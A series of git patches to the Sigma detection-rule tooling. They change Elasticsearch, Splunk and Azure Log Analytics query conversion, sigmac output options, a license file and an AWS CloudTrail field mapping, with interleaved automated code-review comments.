From 47bd41f0125a82972319d51d04cf6c88da46ed02 Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 05:55:12 -0500 Subject: [PATCH 0001/1367] revert commented line --- tools/sigma/backends/elasticsearch.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index a0c80dae..6c4a9537 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -216,7 +216,7 @@ class ElasticsearchWildcardHandlingMixin(object): """ if value and not value == 'null' and not re.match(r'^/.*/$', value) and (re.search('[a-zA-Z]', value) and not re.match(self.uuid_regex, value) or self.containsWildcard(value)): # re.search for alpha is fastest: # Turn single ending '\\' into non escaped (ie: '\\*') - #value = re.sub( r"((?\\*", value ) + value = re.sub( r"((?\\*", value ) # Make upper/lower value = re.sub( r"[A-Za-z]", lambda x: "[" + x.group( 0 ).upper() + x.group( 0 ).lower() + "]", value ) # Turn `.` into wildcard, only if odd number of '\'(because this would mean already escaped) From caf65869285accb34807cb598850bf58f16a8f7b Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 06:49:57 -0500 Subject: [PATCH 0002/1367] Add logic to NOT quote an analyzed field if it contains wildcard, things such as '*' get treated as an exact match Signed-off-by: Nate Guagenti --- tools/sigma/backends/elasticsearch.py | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 6c4a9537..1c8ab23b 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py 
@@ -269,8 +269,11 @@ class ElasticsearchQuerystringBackend(DeepFieldMappingMixin, ElasticsearchWildca if make_ci.get('is_regex'): # Determine if still should be a regex result = "/%s/" % result # Regex place holders for regex return result - else: - return "\"%s\"" % result + else: # If analyzed field contains wildcard then do NOT quote otherwise things such as '*' get treated as an exact match + if self.containsWildcard(result): + return result + else: + return "\"%s\"" % result def generateNOTNode(self, node): expression = super().generateNode(node.item) From 36656c3facb2f149cb5ed30e5a06cf27c49d81cf Mon Sep 17 00:00:00 2001 From: Nate Guagenti Date: Mon, 18 Jan 2021 07:01:50 -0500 Subject: [PATCH 0003/1367] Add to ElasticsearchDSLBackend the logic to NOT quote an analyzed field if it contains wildcard, things such as '*' get treated as an exact match Signed-off-by: Nate Guagenti --- tools/sigma/backends/elasticsearch.py | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 1c8ab23b..a5b6f3f2 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -421,8 +421,12 @@ class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, Elast queryType = 'wildcard' value_cleaned = self.escapeSlashes(self.cleanValue(str(v))) else: - queryType = 'match_phrase' - value_cleaned = self.cleanValue(str(v)) + if self.containsWildcard(str(v)): + queryType = 'wildcard' + value_cleaned = self.escapeSlashes(self.cleanValue(str(v))) + else: + queryType = 'match_phrase' + value_cleaned = self.cleanValue(str(v)) res['bool']['should'].append({queryType: {key_mapped: value_cleaned}}) return res elif value is None: 
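Review bot: The new `else:` that immediately nests `if self.containsWildcard(result)` reads better as a flat chain continuing the visible `if make_ci.get('is_regex')`, i.e. `elif self.containsWildcard(result): return result` followed by `else: return "\"%s\"" % result`. Returning `result` unquoted also means any whitespace or reserved query_string characters still present in the value are now interpreted by Elasticsearch instead of being matched literally; the hunk does not show what cleaning `result` received earlier, so a one-line comment stating that the caller guarantees `result` is already escaped for an unquoted term would help the next reader. The enclosing method starts before the hunk.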
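Review bot: The added `if self.containsWildcard(str(v))` branch repeats the two assignments of the preceding branch verbatim (`queryType = 'wildcard'` and the `escapeSlashes(...)` call), so the intent is simpler to express by extending that branch's condition with `or self.containsWildcard(str(v))` and keeping a single wildcard/match_phrase split; the same duplication appears in this commit's second hunk (`@@ -442`). The first condition of the chain is outside the hunk, so its exact form cannot be checked here. Routing more values to a `wildcard` query also changes cost on the cluster, since a value with a leading `*` becomes a leading-wildcard term query; a comment noting that trade-off next to the branch would help future tuning.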
@@ -442,8 +446,12 @@ class ElasticsearchDSLBackend(DeepFieldMappingMixin, RulenameCommentMixin, Elast queryType = 'wildcard' value_cleaned = self.escapeSlashes(self.cleanValue(str(value))) else: - queryType = 'match_phrase' - value_cleaned = self.cleanValue(str(value)) + if self.containsWildcard(str(value)): + queryType = 'wildcard' + value_cleaned = self.escapeSlashes(self.cleanValue(str(value))) + else: + queryType = 'match_phrase' + value_cleaned = self.cleanValue(str(value)) return {queryType: {key_mapped: value_cleaned}} elif isinstance(value, SigmaRegularExpressionModifier): key_mapped = self.fieldNameMapping(key, value) From 528be5977cb686e9444b19db126449d7bb4dd12f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 14 May 2021 12:53:42 +0200 Subject: [PATCH 0004/1367] Update LICENSE.Detection.Rules.md --- LICENSE.Detection.Rules.md | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/LICENSE.Detection.Rules.md b/LICENSE.Detection.Rules.md index 2b801890..6475b151 100644 --- a/LICENSE.Detection.Rules.md +++ b/LICENSE.Detection.Rules.md @@ -1,4 +1,4 @@ -# Detection Rule License (DRL) 1.0 +# Detection Rule License (DRL) 1.1 Permission is hereby granted, free of charge, to any person obtaining a copy of this rule set and associated documentation files (the "Rules"), to deal in the Rules without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Rules, and to permit persons to whom the Rules are furnished to do so, subject to the following conditions: 
@@ -10,4 +10,8 @@ If you share the Rules (including in modified form), you must retain the followi 3. indicate the Rules are licensed under this Detection Rule License, and include the text of, or the URI or hyperlink to, this Detection Rule License to the extent reasonably practicable +If you use the Rules (including in modified form) on data, messages based on matches with the Rules must retain the following if it is supplied within the Rules: + +1. identification of the authors(s) ("author" field) of the Rule and any others designated to receive attribution, in any reasonable manner requested by the Rule author (including by pseudonym if designated). + THE RULES ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE RULES OR THE USE OR OTHER DEALINGS IN THE RULES. \ No newline at end of file From 900263315a7606fd1de6b93743e88f548c903c1d Mon Sep 17 00:00:00 2001 From: Markku Parviainen Date: Sat, 12 Jun 2021 23:09:22 +0300 Subject: [PATCH 0005/1367] Added support for free-text search in logsources configuration, enabling usage of splunk macros and ability to optimize the resulting searches. --- tools/config/splunk-windows.yml | 7 +++++++ tools/sigma/backends/base.py | 10 ++++++++++ tools/sigma/configuration.py | 10 ++++++++++ tools/sigma/parser/condition.py | 6 ++++++ tools/sigma/parser/rule.py | 7 ++++++- 5 files changed, 39 insertions(+), 1 deletion(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 7b02728d..4d5bdecf 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml 
@@ -24,6 +24,13 @@ logsources: service: sysmon conditions: source: 'WinEventLog:Microsoft-Windows-Sysmon/Operational' + windows-process-creation: + product: windows + service: sysmon + category: process_creation + # Optimized search for process creation, being dramatically faster than EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. + # This also supports custom splunk macros. + search: '`example_splunk_macro_for_sysmon` ParentProcessGuid' windows-powershell: product: windows service: powershell diff --git a/tools/sigma/backends/base.py b/tools/sigma/backends/base.py index e9901e06..be15955c 100644 --- a/tools/sigma/backends/base.py +++ b/tools/sigma/backends/base.py @@ -169,6 +169,8 @@ class BaseBackend: return self.applyOverrides(self.generateNotNULLValueNode(node)) elif type(node) == sigma.parser.condition.NodeSubexpression: return self.applyOverrides(self.generateSubexpressionNode(node)) + elif type(node) == sigma.parser.condition.SigmaSearchValueAsIs: + return self.generateValueAsIsNode(node) elif type(node) == tuple: return self.applyOverrides(self.generateMapItemNode(node)) elif type(node) in (str, int): @@ -180,6 +182,9 @@ class BaseBackend: else: raise TypeError("Node type %s was not expected in Sigma parse tree" % (str(type(node)))) + def generateValueAsIsNode(self, node): + raise NotImplementedError("Node type not implemented for this backend") + def generateANDNode(self, node): raise NotImplementedError("Node type not implemented for this backend") 
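Review bot: The new `SigmaSearchValueAsIs` branch returns `self.generateValueAsIsNode(node)` directly while the visible sibling branches all wrap their result in `self.applyOverrides(...)`; if skipping overrides is intentional for as-is text it deserves a comment such as `# as-is search text is emitted verbatim; value overrides do not apply`, otherwise it should be wrapped like the others. The abstract `generateValueAsIsNode` added in the following hunk (`@@ -180`) has no docstring; something like `"""Emit node.value into the query without quoting or escaping; the value originates from the logsource configuration, not from the rule."""` would document the trust boundary, since this is the one node type whose content the backend does not escape. `generateNode` starts before the hunk.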
@@ -248,6 +253,11 @@ class SingleTextQueryBackend(RulenameCommentMixin, BaseBackend, QuoteCharMixin): sort_condition_lists = False # Sort condition items for AND and OR conditions + def generateValueAsIsNode(self, node): + if type(node.value) is list: + return self.listExpression % (self.listSeparator.join(node.value)) + return self.listExpression % node.value + def generateANDNode(self, node): generated = [ self.generateNode(val) for val in node ] filtered = [ g for g in generated if g is not None ] diff --git a/tools/sigma/configuration.py b/tools/sigma/configuration.py index 826775d8..613f3121 100644 --- a/tools/sigma/configuration.py +++ b/tools/sigma/configuration.py @@ -160,6 +160,7 @@ class SigmaConfiguration: class SigmaLogsourceConfiguration: """Contains the definition of a log source""" def __init__(self, logsource=None, defaultindex=None): + self.search = [] if logsource == None: # create empty object self.merged = False self.category = None @@ -210,6 +211,8 @@ class SigmaLogsourceConfiguration: else: raise TypeError("Default index must be string or list of strings") + self.search = [ ls.search for ls in logsource if ls.search ] + self.conditions = [ ls.conditions for ls in logsource if ls.conditions ] # build list of list of (field, value) tuples as base for merged query condition. elif type(logsource) == dict: # create logsource configuration from parsed yaml self.merged = False 
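Review bot: `type(node.value) is list` in `generateValueAsIsNode` should be `isinstance(node.value, list)`, and the method needs a docstring saying that the value is interpolated into the query verbatim. The list branch appears to exist because a merged logsource (`self.search = [ ls.search for ls in logsource if ls.search ]` in the `configuration.py` hunk `@@ -210` on this same page line) collects each source's `search` list, so a merged entry's `node.value` is itself a list of strings; a comment at the list branch, `# merged logsources contribute a list of search strings; join with the backend separator`, would make that coupling visible. Whether `listSeparator` is the right joiner for free-text terms depends on the backend's value, which is not in the hunk.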
@@ -260,6 +263,13 @@ class SigmaLogsourceConfiguration: # from a merge, where default index handling applies. self.index = [] + # free-form text search as-is. Instead of key=value, the value of 'search' is directly the value itself. Appended to conditions. + search = logsource.get('search', None) + if search not in [None, '']: + if type(search) != str: + raise SigmaConfigParseError("search field must be a string: " + repr(search)) + self.search.append(logsource.get('search', '')) + try: if type(logsource['conditions']) != dict: raise SigmaConfigParseError("Logsource conditions must be a map") diff --git a/tools/sigma/parser/condition.py b/tools/sigma/parser/condition.py index a4c908cc..644e2481 100644 --- a/tools/sigma/parser/condition.py +++ b/tools/sigma/parser/condition.py @@ -260,6 +260,12 @@ class NodeSubexpression(ParseTreeNode): self.items = subexpr +class SigmaSearchValueAsIs: + """The contained value is used as-is in the output.""" + def __init__(self, value): + self.value = value + + # Parse tree generators: generate parse tree nodes from extended conditions def generateXOf(sigma, val, condclass): """ diff --git a/tools/sigma/parser/rule.py b/tools/sigma/parser/rule.py index 763beaf5..50a4b321 100644 --- a/tools/sigma/parser/rule.py +++ b/tools/sigma/parser/rule.py @@ -16,7 +16,7 @@ import re from .exceptions import SigmaParseError -from .condition import SigmaConditionTokenizer, SigmaConditionParser, ConditionAND, ConditionOR, ConditionNULLValue +from .condition import SigmaConditionTokenizer, SigmaConditionParser, ConditionAND, ConditionOR, ConditionNULLValue, SigmaSearchValueAsIs from .modifiers import apply_modifiers class SigmaParser: 
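Review bot: After validating the local `search`, the append re-reads the dictionary with `self.search.append(logsource.get('search', ''))`; using the value already checked, `self.search.append(search)`, keeps validation and storage on the same object. `type(search) != str` should be `not isinstance(search, str)`, matching the idiom for type checks. The surrounding `__init__` branch starts before the hunk.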
@@ -168,4 +168,9 @@ class SigmaParser: else: # only one index, add directly to AND from above cond.add((index_field, indices[0])) + # Add free-text search condition, expressed in the configuration as 'search' field. + if len(logsource.search) > 0: + for item in logsource.search: + cond.add(SigmaSearchValueAsIs(item)) + return cond From 0e7ad2bac852c5467d18197b6b17fd397b7fa801 Mon Sep 17 00:00:00 2001 From: Markku Parviainen Date: Wed, 16 Jun 2021 14:51:18 +0300 Subject: [PATCH 0006/1367] small change to splunk logsource config --- tools/config/splunk-windows.yml | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/tools/config/splunk-windows.yml b/tools/config/splunk-windows.yml index 4d5bdecf..40e86484 100644 --- a/tools/config/splunk-windows.yml +++ b/tools/config/splunk-windows.yml @@ -28,9 +28,14 @@ logsources: product: windows service: sysmon category: process_creation - # Optimized search for process creation, being dramatically faster than EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. - # This also supports custom splunk macros. - search: '`example_splunk_macro_for_sysmon` ParentProcessGuid' + # Optimized search for process creation, being dramatically faster in Lispy than just EventCode=1 search, as 'ParentProcessGuid' is more unique than '1' in the raw data. + # This also supports custom splunk macros, just like they are written in splunk (i.e. as `macro`), minding that it has to be written inside the string quotes here. + search: 'ParentProcessGuid EventCode=1' + windows-process-creation: + product: windows + service: sysmon + category: file_creation + search: 'TargetFilename EventCode=11' windows-powershell: product: windows service: powershell From ab3a54c336d5328c97dfc81d45735affb1d5102e Mon Sep 17 00:00:00 2001 
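Review bot: `if len(logsource.search) > 0:` around the `for` loop is redundant, since iterating an empty list adds nothing; `for item in logsource.search: cond.add(SigmaSearchValueAsIs(item))` is sufficient. The comment above it could also state what `item` may be: for a merged logsource configuration the elements appear to be lists of strings rather than strings (see the `configuration.py` change in this commit), which is why the backend handles both shapes. The enclosing method starts before the hunk.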
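Review bot: The added block reuses the key `windows-process-creation` for the `file_creation` entry, so the `logsources` mapping now contains the same key twice; YAML loaders that accept duplicate keys, PyYAML included, keep only the last value, which silently drops the `process_creation` logsource defined just above. Rename the new entry, e.g. `windows-file-creation:`, and consider a test that rejects duplicate logsource keys in config files.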
From: Cody Swanson Date: Sun, 27 Jun 2021 12:08:45 -0700 Subject: [PATCH 0007/1367] Update Elasticsearch Watcher backend to populate name field in alert metadata --- tools/sigma/backends/elasticsearch.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/backends/elasticsearch.py b/tools/sigma/backends/elasticsearch.py index 855e8815..db14cce6 100644 --- a/tools/sigma/backends/elasticsearch.py +++ b/tools/sigma/backends/elasticsearch.py @@ -1038,7 +1038,7 @@ class XPackWatcherBackend(ElasticsearchQuerystringBackend, MultiRuleOutputMixin) iaction = { "elastic":{ "transform":{ #adding title, description, tags on the event - "script": "ctx.payload.transform = [];for (int j=0;j Date: Mon, 28 Jun 2021 19:27:20 +0200 Subject: [PATCH 0008/1367] Add a way to have a output prefix --- tools/sigma/sigmac.py | 23 ++++++++++++++++++----- 1 file changed, 18 insertions(+), 5 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 5d50a373..4608acfb 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
@@ -216,17 +216,30 @@ def main(): backend = backend_class(sigmaconfigs, backend_options) filename = cmdargs.output + fileprefix = None if filename: - try: - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) + if filename[-1:] == '_': + fileprefix = filename + else: + try: + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) else: out = sys.stdout error = 0 for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): + if fileprefix : + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','.rule') # add a option to extension ? + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + logger.debug("* Processing Sigma input %s" % (sigmafile)) try: if cmdargs.inputs == ['-']: From b26fc228b4a662699b143f1e97ba877eab92ac80 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 28 Jun 2021 21:25:51 +0200 Subject: [PATCH 0009/1367] update help and add '/' or '\\' for surfix --- tools/sigma/sigmac.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 4608acfb..7262c515 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
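Review bot: With a prefix, the loop opens a new `out` for every input (`out = open(filename, "w", encoding='utf-8')`) and never closes the previous handle, so a large recursive run leaks one descriptor per rule and buffered output is only flushed at interpreter exit; close the previous `out` before reopening (when it is not `sys.stdout`), or wrap the per-file write in a `with` block. `filename.replace('.yml','.rule')` also rewrites any occurrence of `.yml` in the prefix or name, not just the suffix; `fileprefix + Path(sigmafile.name).with_suffix('.rule').name` limits the change to the extension. The same line is modified again in the `@@ -234` hunk of the later `--output-extention` commit and in the per-result branches of the "action yml" commit, which inherit both issues. `main` starts before the hunk.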
@@ -102,7 +102,7 @@ def set_argparser(): argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") - argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix if multiple files are generated") + argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\') if multiple files are generated") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") @@ -218,7 +218,7 @@ def main(): filename = cmdargs.output fileprefix = None if filename: - if filename[-1:] == '_': + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: try: From bb8fe7f3b8b512934216343a9769e8436ef2269d Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 29 Jun 2021 08:13:48 +0200 Subject: [PATCH 0010/1367] Add `--output-extention` if you want a custom output file extention (.ndjson,.txt,.splunk,..) --- tools/sigma/sigmac.py | 17 +++++++++++++---- 1 file changed, 13 insertions(+), 4 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 7262c515..bfca7c06 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py 
@@ -102,7 +102,8 @@ def set_argparser(): argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") argparser.add_argument("--config", "-c", action="append", help="Configurations with field name and index mapping for target environment. Multiple configurations are merged into one. Last config is authoritative in case of conflicts.") - argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\') if multiple files are generated") + argparser.add_argument("--output", "-o", default=None, help="Output file or filename prefix (if end with a '_','/' or '\\')") + argparser.add_argument("--output-extention", "-e", default=None, help="Extention of Output file for filename prefix use") argparser.add_argument("--print0", action="store_true", help="Delimit results by NUL-character") argparser.add_argument("--backend-option", "-O", action="append", help="Options and switches that are passed to the backend") argparser.add_argument("--backend-config", "-C", help="Configuration file (YAML format) containing options to pass to the backend") @@ -135,7 +136,6 @@ def list_modifiers(modifiers): def main(): argparser = set_argparser() cmdargs = argparser.parse_args() - scm = SigmaConfigurationManager() logger = logging.getLogger(__name__) @@ -214,10 +214,19 @@ def main(): backend_options = BackendOptions(cmdargs.backend_option, cmdargs.backend_config) backend = backend_class(sigmaconfigs, backend_options) - + + filename_ext = cmdargs.output_extention filename = cmdargs.output fileprefix = None if filename: + if filename_ext: + if filename_ext[0] == '.': + pass + else: + filename_ext = '.' + filename_ext + else: + filename_ext = '.rule' + if filename[-1:] in ['_','/','\\']: fileprefix = filename else: 
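Review bot: The new option is spelled `--output-extention` (and its help text `Extention of Output file`), which becomes part of the public CLI; renaming it later breaks scripts, so register the correct spelling now and keep the misspelled form as an alias, e.g. `argparser.add_argument("--output-extension", "--output-extention", "-e", dest="output_extension", default=None, help="Extension of the output file(s) when --output is a prefix")`, with the `cmdargs.output_extention` read in `@@ -214` following the chosen `dest`.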
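Review bot: The extension normalisation `if filename_ext[0] == '.': pass else: filename_ext = '.' + filename_ext` can drop the empty branch: `if not filename_ext.startswith('.'): filename_ext = '.' + filename_ext`. Since `filename_ext` is only consulted inside `if filename:`, an extension passed without `--output` is silently ignored; a warning or a sentence in the help text would make that visible. `main` starts before the hunk and continues after it.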
@@ -234,7 +243,7 @@ def main(): if fileprefix : try: filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml','.rule') # add a option to extension ? + filename = filename.replace('.yml',filename_ext) out = open(filename, "w", encoding='utf-8') except (IOError, OSError) as e: print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) From f2b24ea6a37ce7eab3718aa444721b41044b150b Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 29 Jun 2021 17:45:59 +0200 Subject: [PATCH 0011/1367] Add support for action yml --- tools/sigma/sigmac.py | 35 +++++++++++++++++++++++++---------- 1 file changed, 25 insertions(+), 10 deletions(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index bfca7c06..50196933 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -240,15 +240,6 @@ def main(): error = 0 for sigmafile in get_inputs(cmdargs.inputs, cmdargs.recurse): - if fileprefix : - try: - filename = fileprefix + str(sigmafile.name) - filename = filename.replace('.yml',filename_ext) - out = open(filename, "w", encoding='utf-8') - except (IOError, OSError) as e: - print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) - exit(ERR_OUTPUT) - logger.debug("* Processing Sigma input %s" % (sigmafile)) try: if cmdargs.inputs == ['-']: 
@@ -257,10 +248,34 @@ def main(): f = sigmafile.open(encoding='utf-8') parser = SigmaCollectionParser(f, sigmaconfigs, rulefilter, sigmafile) results = parser.generate(backend) - + + nb_result = len(list(parser.generate(backend))) + if nb_result > 1 : + inc_filenane = 0 + else: + inc_filenane = None + newline_separator = '\0' if cmdargs.print0 else '\n' for result in results: + if not fileprefix == None and not inc_filenane == None: #yml action + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml','_' + str(inc_filenane) + filename_ext) + inc_filenane += 1 + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) + elif not fileprefix == None and inc_filenane == None: # a simple yml + try: + filename = fileprefix + str(sigmafile.name) + filename = filename.replace('.yml',filename_ext) + out = open(filename, "w", encoding='utf-8') + except (IOError, OSError) as e: + print("Failed to open output file '%s': %s" % (filename, str(e)), file=sys.stderr) + exit(ERR_OUTPUT) print(result, file=out, end=newline_separator) + except OSError as e: print("Failed to open Sigma file %s: %s" % (sigmafile, str(e)), file=sys.stderr) error = ERR_OPEN_SIGMA_RULE From 7b001b6b91b76a555837a3c8af2a35c77d7369da Mon Sep 17 00:00:00 2001 From: Denny Lin Date: Thu, 15 Jul 2021 18:04:08 +0800 Subject: [PATCH 0012/1367] Fix issue [ADA] Convesion of wildcard not as expected for ada backend. #1689 --- tools/sigma/backends/ala.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index c053004e..2489a7bb 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py 
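Review bot: `nb_result = len(list(parser.generate(backend)))` runs the whole backend generation a second time, right after `results = parser.generate(backend)`, purely to count the results; materialise once with `results = list(parser.generate(backend))` and then `inc_filenane = 0 if len(results) > 1 else None`. If `generate` has side effects on the backend (state accumulated across rules, for instance), the double call also changes the output, which this hunk does not show either way. The two `open(...)` branches are near-identical and still never close the previous `out`, `not fileprefix == None` should be `fileprefix is not None`, and `inc_filenane` looks like a typo for `inc_filename`. `main` starts before the hunk.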
@@ -119,10 +119,13 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): elif val.startswith("*") or val.endswith("*"): if val.startswith("*") and val.endswith("*"): op = "contains" + val = val[1:-1] elif val.startswith("*"): op = "endswith" + val = val[1:] elif val.endswith("*"): op = "startswith" + val = val[:-1] val = re.sub('([".^$]|(?![*?]))', '\g<1>', val) val = re.sub('(\\\\\*|\*)', '', val) val = re.sub('\\?', '.', val) From f9997ace537eb1d51f83c37431fc2368ccb1afb2 Mon Sep 17 00:00:00 2001 From: matsto Date: Thu, 15 Jul 2021 16:58:09 +0200 Subject: [PATCH 0013/1367] Fixed transformation modifier for keywords --- rules/windows/builtin/win_susp_msmpeng_crash.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_susp_msmpeng_crash.yml b/rules/windows/builtin/win_susp_msmpeng_crash.yml index 15b527e7..6e240550 100644 --- a/rules/windows/builtin/win_susp_msmpeng_crash.yml +++ b/rules/windows/builtin/win_susp_msmpeng_crash.yml @@ -23,7 +23,7 @@ detection: Source: 'Windows Error Reporting' EventID: 1001 keywords: - Message|contains: + Message|contains|all: - 'MsMpEng.exe' - 'mpengine.dll' condition: 1 of selection* and keywords From ce0d84acd7c09c59c693e3bfe017199cf83b0ee1 Mon Sep 17 00:00:00 2001 From: Ibrahim Ali Khan Date: Thu, 15 Jul 2021 21:51:41 +0500 Subject: [PATCH 0014/1367] Create ala-azure-aws_cloudtrail.yml AWS CloudTrail Logs mapping for Azure Log Analytics --- tools/config/ala-azure-aws_cloudtrail.yml | 46 +++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 tools/config/ala-azure-aws_cloudtrail.yml diff --git a/tools/config/ala-azure-aws_cloudtrail.yml b/tools/config/ala-azure-aws_cloudtrail.yml new file mode 100644 index 00000000..b84f5fdf --- /dev/null +++ b/tools/config/ala-azure-aws_cloudtrail.yml 
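Review bot: The added slices remove only the leading and trailing `*`, but the later `val = re.sub('(\\\\\*|\*)', '', val)` still deletes every remaining `*`, so a value such as `*foo*bar*` becomes `contains "foobar"` and silently stops matching what the rule author wrote; that is a false-negative risk for any rule with an inner wildcard, and this commit does not address it. If inner wildcards are unsupported in this backend, raising a clear error or translating the value to a regex operator is safer than dropping the character. The enclosing method starts before the hunk.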
@@ -0,0 +1,46 @@
+title: AWS CloudTrail Logs mapping for Azure Log Analytics
+order: 20
+backends:
+ - ala
+ - ala-rule
+fieldmappings:
+ additionalEventdata: AdditionalEventData
+ apiVersion: APIVersion
+ awsRegion: AWSRegion
+ errorCode: ErrorCode
+ errorMessage: ErrorMessage
+ eventID: AwsEventId
+ eventName: EventName
+ eventSource: EventSource
+ eventTime: TimeGenerated
+ eventType: EventTypeName
+ eventVersion: EventVersion
+ managementEvent: ManagementEvent
+ readOnly: ReadOnly
+ recipientAccountId: RecipientAccountId
+ requestID: AwsRequestId_
+ requestParameters: RequestParameters
+ responseElements: ResponseElements
+ serviceEventDetails: ServiceEventDetails
+ sourceIPAddress: SourceIpAddress
+ userAgent: UserAgent
+ userIdentity.accessKeyId: UserIdentityAccessKeyId
+ userIdentity.accountId: UserIdentityAccountId
+ userIdentity.arn: UserIdentityArn
+ userIdentity.invokedBy: UserIdentityInvokedBy
+ userIdentity.principalId: UserIdentityPrincipalid
+ userIdentity.sessionContext.attributes.creationDate: SessionCreationDate
+ userIdentity.sessionContext.attributes.mfaAuthenticated: SessionMfaAuthenticated
+ userIdentity.sessionContext.sessionIssuer.userName: SessionIssuerUserName
+ userIdentity.sessionContext.sessionIssuer.type: SessionIssuerType
+ userIdentity.sessionContext.sessionIssuer.principalId: SessionIssuerPrincipalId
+ userIdentity.sessionContext.sessionIssuer.arn: SessionIssuerArn
+ userIdentity.sessionContext.sessionIssuer.accountId: SessionIssuerAccountId
+ userIdentity.type: UserIdentityType
+ userIdentity.userName: UserIdentityUserName
+ vpcEndpointId: VpcEndpointId
+overrides:
+ - field: ErrorCode
+ value: 999999
+ regexes:
+ - (ErrorCode contains \'\')
From 1cb631017a04479777158f5e4ec9266a6ea39a2f Mon Sep 17 00:00:00 2001 
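Review bot: The mapping `requestID: AwsRequestId_` ends in an underscore that no other target column has; if that is the literal column name in the workspace table, a comment saying so would stop the next reader from "fixing" it, otherwise it is a typo. The `overrides` entry that rewrites `ErrorCode` to `999999` when `(ErrorCode contains \'\')` matches carries no explanation of what the sentinel value means for rules; a comment above `overrides:` describing the intent is needed. `eventTime: TimeGenerated` maps the event's own timestamp onto a column that may reflect ingestion time rather than event time, which can differ by minutes; worth stating in a comment if deliberate.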
